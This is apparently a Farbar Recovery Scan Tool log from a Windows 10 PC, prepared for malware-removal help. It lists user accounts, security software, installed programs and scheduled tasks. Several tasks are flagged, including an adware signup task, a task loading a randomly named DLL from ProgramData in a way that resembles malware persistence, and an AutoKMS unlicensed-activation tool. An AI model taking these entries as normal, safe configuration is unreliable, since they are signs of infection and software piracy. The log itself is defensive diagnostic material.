C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2016-02-29 12:25
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version:27-02-2016
Ran by Kym (2016-02-29 20:46:27)
Running from C:\Users\Kym\Desktop
Windows 10 Home (X64) (2015-08-08 15:48:30)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-788086572-3644745805-1037152649-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-788086572-3644745805-1037152649-503 - Limited - Disabled)
Guest (S-1-5-21-788086572-3644745805-1037152649-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-788086572-3644745805-1037152649-1002 - Limited - Enabled)
Kym (S-1-5-21-788086572-3644745805-1037152649-1000 - Administrator - Enabled) => C:\Users\Kym
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Spybot - Search and Destroy (Enabled - Up to date) {A16C3F68-9280-E053-1818-342707FECF4D}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
µTorrent (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\uTorrent) (Version: 3.4.5.41712 - BitTorrent Inc.)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.010.20059 - Adobe Systems Incorporated)
Adobe Photoshop CC 2014 (HKLM-x32\...\{D7A4F897-B20A-42D0-862D-CB5F6DB7391D}) (Version: 15.0 - Adobe Systems Incorporated)
Adobe Premiere Elements 11 (HKLM\...\PremElem110) (Version: 11.0 - Adobe Systems Incorporated)
Adobe Premiere Elements 11 (Version: 11.0 - Adobe Systems Incorporated) Hidden
Adobe Reader XI (11.0.13) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.13 - Adobe Systems Incorporated)
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 5.00 - Advanced Micro Devices, Inc.)
Apple Application Support (32-bit) (HKLM-x32\...\{3540ADD5-822B-47FB-B1C2-CD7B2C8E9FEC}) (Version: 4.0.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{C9C0FE2C-602E-49D7-8C42-5B9E8FF04798}) (Version: 4.0.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{FD244E19-6EFE-4A2D-948A-0D45D4C168BE}) (Version: 9.0.0.26 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Arma 3 (HKLM-x32\...\Steam App 107410) (Version: - Bohemia Interactive)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 10.2.2218 - AVAST Software)
Awesomenauts (HKLM-x32\...\Steam App 204300) (Version: - Ronimo Games)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Beyond Gravity (HKLM-x32\...\Steam App 317510) (Version: - Qwiboo Ltd)
BioShock (HKLM-x32\...\Steam App 7670) (Version: - 2K Boston)
BioShock 2 (HKLM-x32\...\Steam App 8850) (Version: - 2K Marin)
BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version: - Irrational Games)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Brother MFL-Pro Suite DCP-J4110DW (HKLM-x32\...\{DD98C438-D769-4677-AA87-3481FA32D20C}) (Version: 2.0.0.0 - Brother Industries, Ltd.)
Catalyst Control Center Next Localization BR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Clicker Heroes (HKLM-x32\...\Steam App 363970) (Version: - Playsaurus)
Contagion (HKLM-x32\...\Steam App 238430) (Version: - Monochrome LLC)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
DayZ (HKLM-x32\...\Steam App 221100) (Version: - Bohemia Interactive)
Diablo III (HKLM-x32\...\Diablo III) (Version: - Blizzard Entertainment)
Dota 2 (HKLM-x32\...\Steam App 570) (Version: - Valve)
Elements 11 Organizer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
f.lux (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Flux) (Version: - )
Full Tilt Poker (HKLM-x32\...\{D4C9692E-4EFA-4DA0-8B7F-9439466D9E31}) (Version: 5.44.1.WIN.FullTilt.COM - )
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version: - Facepunch Studios)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Drive (HKLM-x32\...\{EF61675D-9BBC-4EC7-B906-F13BE8D3BD20}) (Version: 1.27.1227.2094 - Google, Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version: - Blizzard Entertainment)
IBM SPSS Statistics 23 (HKLM\...\{C3BA73A4-2A45-4036-8541-4F5F8146078B}) (Version: 23.0.0.0 - IBM Corp)
iExplorer 3.6.1.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version: - Macroplant LLC)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3308 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
Internode Monthly Usage Meter 8.6.3 (HKLM-x32\...\Internode Monthly Usage Meter_is1) (Version: - )
iTunes (HKLM\...\{88509E20-3936-4D88-A1C0-B274C7BB5151}) (Version: 12.3.0.44 - Apple Inc.)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Java 8 Update 74 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218074F0}) (Version: 8.0.740.2 - Oracle Corporation)
League of Legends (HKLM-x32\...\League of Legends 3.0.0) (Version: 3.0.0 - Riot Games)
League of Legends (x32 Version: 3.0.0 - Riot Games) Hidden
Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version: - Valve)
Logitech G35 (HKLM\...\{27607A94-33AC-4AA7-AACE-95AF6ACA3E30}) (Version: 1.1.178 - Logitech)
Logitech Gaming Software 8.70 (HKLM\...\Logitech Gaming Software) (Version: 8.70.315 - Logitech Inc.)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.410 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.410 - LogMeIn, Inc.) Hidden
Marvel Heroes 2015 (HKLM-x32\...\Steam App 226320) (Version: - Gazillion Entertainment)
Metro: Last Light (HKLM-x32\...\Steam App 43160) (Version: - 4A Games)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Middle Earth Shadow of Mordor (HKLM-x32\...\Middle Earth Shadow of Mordor_is1) (Version: - )
Monaco What's Yours Is Mine (HKLM-x32\...\Monaco What's Yours Is Mine_is1) (Version: Monaco What's Yours Is Mine - )
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Nitronic Rush (IGF Pro 2012) version 20111017.0 (HKLM-x32\...\{9B55759D-424F-4CB1-B84E-AAE83CC1D20A}_is1) (Version: 20111017.0 - DigiPen)
Nuance PaperPort 12 (HKLM-x32\...\{88B5FBDC-967D-4B1F-B291-39284AE12201}) (Version: 12.1.0005 - Nuance Communications, Inc.)
Nuance PDF Viewer Plus (HKLM-x32\...\{28656860-4728-433C-8AD4-D1A930437BC8}) (Version: 5.30.3290 - Nuance Communications, Inc)
NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
ON_OFF Charge 2 B13.1028.1 (HKLM-x32\...\InstallShield_{6B4ED6F7-BB88-4945-B0C6-01410E1BAC3A}) (Version: 1.00.0000 - GIGABYTE)
ON_OFF Charge 2 B13.1028.1 (x32 Version: 1.00.0000 - GIGABYTE) Hidden
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - )
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Outils de vérification linguistique 2013 de Microsoft Office*- Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
PaperPort Image Printer 64-bit (HKLM\...\{715CAACC-579B-4831-A5F4-A83A8DE3EFE2}) (Version: 14.00.0000 - Nuance Communications, Inc.)
PokerStars (HKLM-x32\...\PokerStars) (Version: - PokerStars)
PRE11 STI 64Installer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Razer Chroma SDK Core Components (HKLM-x32\...\Razer Chroma SDK) (Version: 1.2.4 - Razer Inc.)
Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 1.18.21.28188 - Razer Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Remote Mouse version 2.70 (HKLM-x32\...\{01E4BC6D-3ACC-45E1-8928-C2FF626F63F3}_is1) (Version: 2.70 - Remote Mouse)
Scansoft PDF Professional (x32 Version: - ) Hidden
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (Version: - Microsoft) Hidden
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version: - 2K Games, Inc.)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Spotify) (Version: 1.0.21.143.g76c19bcd - Spotify AB)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.5.43 - Safer-Networking Ltd.)
StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version: - Valve)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.14 - TeamSpeak Systems GmbH)
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version: - TechPowerUp)
The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version: - Bethesda Game Studios)
Tom Clancy's Rainbow Six Siege (HKLM-x32\...\Steam App 359550) (Version: - Ubisoft Montreal)
Total War: ROME II (HKLM-x32\...\Steam App 214950) (Version: - Creative Assembly)
Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 3.3.1 - Tweaking.com)
Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{0FA8AE0C-69AE-4F60-A1AB-F79C6BA5A999}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
Uplay (HKLM-x32\...\Uplay) (Version: 14.0 - Ubisoft)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WinRAR 5.10 beta 4 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.10.4 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-788086572-3644745805-1037152649-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileCoAuth.exe => No File
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {00BB5CDE-A0A3-4126-A329-684FCE96F2DA} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {050D098B-C2C3-4064-986C-7B3596E444B9} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {052BB96E-EC57-4A5E-A676-5F530A65E1E1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-07] (Google Inc.)
Task: {0670C04C-B47A-469A-BABD-11885BDDC6F8} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
Task: {105E72D9-5D9B-4EBD-BC8B-F6126EAAA214} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {111506E3-934F-4F4D-9D88-D03FD254704B} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-07-16] (Adobe Systems Incorporated)
Task: {12E05F11-8F42-466E-B87E-05F00D57783A} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {154B1B4C-8AD3-4E88-87B8-08F151623FF3} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {19DDEC2D-39E9-4390-B737-F534A99F91FC} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {1EB27F80-D69B-4285-8431-E37E2A44624A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {23C32510-6B84-4F00-B6A2-A3556CA995C0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {2425DF79-2B81-4356-8999-0E846F585C3E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {3405AE0C-9596-4F8A-B29D-FDD7C18CB80B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {3E5A6177-182D-4F8D-A9F3-8E88742C9F43} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {3F60BAAC-153B-4504-9150-B1875260A145} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-27] (Apple Inc.)
Task: {40943A4E-8129-4656-ADEA-C3441A09E687} - System32\Tasks\{9DCFB73E-9A6F-ACFC-B0BC-4203F9A4BD3D} => /s /n /i:"/rt" "C:\PROGRA~3\3c355888\4543324a.dll"
Task: {4444829F-A5AF-49DC-AF46-C3F292BDE7F4} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated)
Task: {4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {4A494596-5721-43AD-B292-95778C23DE63} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2015-06-16] (Safer-Networking Ltd.)
Task: {4C4DB1A9-42FA-4381-9A15-5850F64B0A92} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {57517555-5931-478E-AC60-FE526E78EA1D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {5AE7144B-08D0-4C2C-83D2-0E78DFE05C4D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe
Task: {672C6DB8-E782-46C4-862A-91937DDD6CCD} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {6A6EF366-2189-44F1-810D-31ADBAD25AD5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-07] (Google Inc.)
Task: {6EC4A1B2-08CF-4BE5-86DE-014C8ED8CEFF} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {70F8276A-CEAC-48F6-AF84-A7EF81E36D85} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {8E8CEF76-7805-4BD1-90FE-CC39F53EDC96} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {9F538C47-5B98-42B5-A6A0-FFC9989F17DE} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {A39A9765-388B-4CFB-9115-FF2DE387651A} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {AD51084B-8DF2-45A4-A9D7-BB445D07A559} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {B771CEDA-ABD2-43D9-9157-9B1E2DEE95CB} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {B7A49348-60C5-42CB-A154-78E339B9B4EE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe
Task: {C16563DF-BFCB-40D7-BD4E-0C8FFFFCE317} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C4FE1DCE-FEAA-4B30-95BA-F1A5394963A4} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2015-06-16] (Safer-Networking Ltd.)
Task: {C85142E9-7D8C-4BBB-8B73-0987957BAFF6} - System32\Tasks\AMD Updater => C:\Program Files\AMD\CIM\\Bin64\InstallManagerApp.exe [2015-12-04] (Advanced Micro Devices, Inc.)
Task: {CA6266EC-F1C1-4C19-AA06-B0AD8D0AB114} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {CD7F75C4-6EF1-4B40-A64D-B4F4D874B8BC} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2015-06-16] (Safer-Networking Ltd.)
Task: {D034A175-EFC9-4CF2-A88F-697EA1808E3E} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {DD980370-DE9B-48AE-8689-09B4DE7A48CE} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {E4C27559-2796-43A7-BB20-D17DF93E1921} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {E645F142-F242-4000-9AAD-6E453D099B5F} - System32\Tasks\{87D6A7E6-7111-4A2D-8253-E40D040C3BA9} => pcalua.exe -a F:\Seagate\Setup.exe -d F:\Seagate
Task: {EA61F2D7-4B50-4E49-896F-214D33BA8108} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {EB850747-54A4-4253-8644-DD8AF435E430} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {EC1A0053-4233-4A19-B33C-29FB18854840} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {EC2D2A3E-E44B-44C6-8E6E-EA7A037E1BFF} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2014-09-10] ()
Task: {F260FB74-77B4-4085-8A55-DE82940B9EC6} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
